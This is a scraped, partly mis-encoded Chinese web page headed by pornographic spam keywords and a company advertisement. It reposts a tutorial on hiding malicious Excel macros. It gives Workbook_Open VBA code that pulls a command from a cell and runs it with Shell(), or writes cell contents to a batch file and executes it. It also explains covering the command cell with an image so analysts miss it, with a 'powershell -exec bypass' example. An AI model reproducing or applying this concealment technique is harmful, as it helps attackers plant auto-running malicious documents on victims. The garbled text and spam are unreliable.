日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何在Excel中更好地隱藏惡意宏代碼

 你可能會(huì)問,為什么不簡單地使用實(shí)際上不涉及工作簿的代碼,以及主要原因是避免網(wǎng)絡(luò)流量。當(dāng)然,你可以簡單地添加宏,這些宏會(huì)將每行代碼添加到一個(gè)新文件中,以避免網(wǎng)絡(luò)流量,但是這樣做會(huì)使活動(dòng)對(duì)于任何分析文檔的人來說都是顯而易見的,他們會(huì)在查看時(shí)立即看到新的代碼行宏。使用這種方法,它使得對(duì)惡意文檔的分析稍微困難一些,但是當(dāng)然不是很多。

成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù),包含不限于成都網(wǎng)站建設(shè)、成都做網(wǎng)站、沙市網(wǎng)絡(luò)推廣、重慶小程序開發(fā)、沙市網(wǎng)絡(luò)營銷、沙市企業(yè)策劃、沙市品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等,從售前售中售后,我們都將竭誠為您服務(wù),您的肯定,是我們最大的嘉獎(jiǎng);成都創(chuàng)新互聯(lián)公司為所有大學(xué)生創(chuàng)業(yè)者提供沙市建站搭建服務(wù),24小時(shí)服務(wù)熱線:18982081108,官方網(wǎng)址:www.cdcxhl.com

注意:僅對(duì)文檔運(yùn)行oledump或olevba之類的工具將返回宏。

此時(shí)你會(huì)看到,該宏正在從特定列中提取代碼并使用Shell()執(zhí)行該代碼,但該代碼顯然非??梢桑?/p>

而且,如果我們導(dǎo)航到代碼所在的BG1,我們不會(huì)立即看到任何可疑的東西:但是,如果將鼠標(biāo)懸停在BG1上(或者稍微靠近一下并注意到未對(duì)齊的列),那么你會(huì)看到在代碼上覆蓋了一個(gè)圖像:

顯然,更有耐心的人可以完善空列的屏幕截圖,并將其覆蓋在代碼頂部以使其不那么引人注意。揭示從工作表中提取的代碼的另一種方法是使用MsgBox:

1. 一組要覆蓋在代碼頂部的空列的屏幕截圖,例如:

2. 從工作簿中提取代碼并運(yùn)行數(shù)據(jù)的宏:

 
 
 
    
  
  
  
  1. Private Sub Workbook_Open() 
    2. 
  
  
  
  2. Data = Sheet1.Range("BG1") 
    3. 
  
  
  
  3. Shell(Data) 
    4. 
  
  
  
  4. End Sub 
    5.

 

Data = Sheet1.Range("BG1")僅查看位于BG1的行,提取該行中的所有內(nèi)容并將其放在變量Data中。

3. 打開文檔并在用戶單擊“啟用內(nèi)容”后將提取并執(zhí)行的代碼。

 
 
 
    
  
  
  
  1. powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt 
    2.

將代碼插入所需的任何列后,只需將空列的圖像插入代碼上方(插入>插圖>圖片)。

然后將宏插入ThisWorkbook并更改Range()部分以與你的列匹配。因此,如果你將數(shù)據(jù)插入A列并且位于第一行,它就是Range("A1")。

將多行寫入文件

向文件寫入多行只是小菜一碟,只需要添加幾行代碼即可。

使用的宏代碼如下所示:

 
 
 
    
  
  
  
  1. Private Sub Workbook_Open() 
    2. 
  
  
  
  2. 1. Dim Path As String 
    3. 
  
  
  
  3. 2. Dim FileNumber As Integer 
    4. 
  
  
  
  4. 3. FileNumber = FreeFile 
    5. 
  
  
  
  5. 4. Data = Sheet1.Range("BG1") 
    6. 
  
  
  
  6. 5. Data2 = Sheet1.Range("BG2") 
    7. 
  
  
  
  7. 6. Path = "test.bat" 
    8. 
  
  
  
  8. 7. Open Path For Output As FileNumber 
    9. 
  
  
  
  9. 8.    Print #FileNumber, Data 
    10. 
  
  
  
  10. 9.    Print #FileNumber, Data2 
    11. 
  
  
  
  11. 10.    Close FileNumber 
    12. 
  
  
  
  12. 11. Shell(Path) 
    13. 
  
  
  
  13. End Sub 
    14.

 

第1-3行是靜態(tài)的,保持原樣,它們只是定義使用的變量。第4-6行是動(dòng)態(tài)的。你將需要根據(jù)excel工作表將4和5中的字符串更改為代碼所在的位置。將第6行更改為所需的文件路徑。

第7-9行也是動(dòng)態(tài)的,它們僅打開文件并將已提取的數(shù)據(jù)寫入文件。特別是第8和9行是負(fù)責(zé)將數(shù)據(jù)寫入文件的行。

只需將要寫入文件的代碼插入到工作簿中,并記下該文件所在的列和行,并更改Data&Data1變量以與你的列和行匹配(如果需要的話,添加更多的變量)。然后,將工作簿中的代碼與空行的屏幕截圖疊加,然后開始就可以了!


文章標(biāo)題:如何在Excel中更好地隱藏惡意宏代碼
文章鏈接:http://www.dlmjj.cn/article/ccephhj.html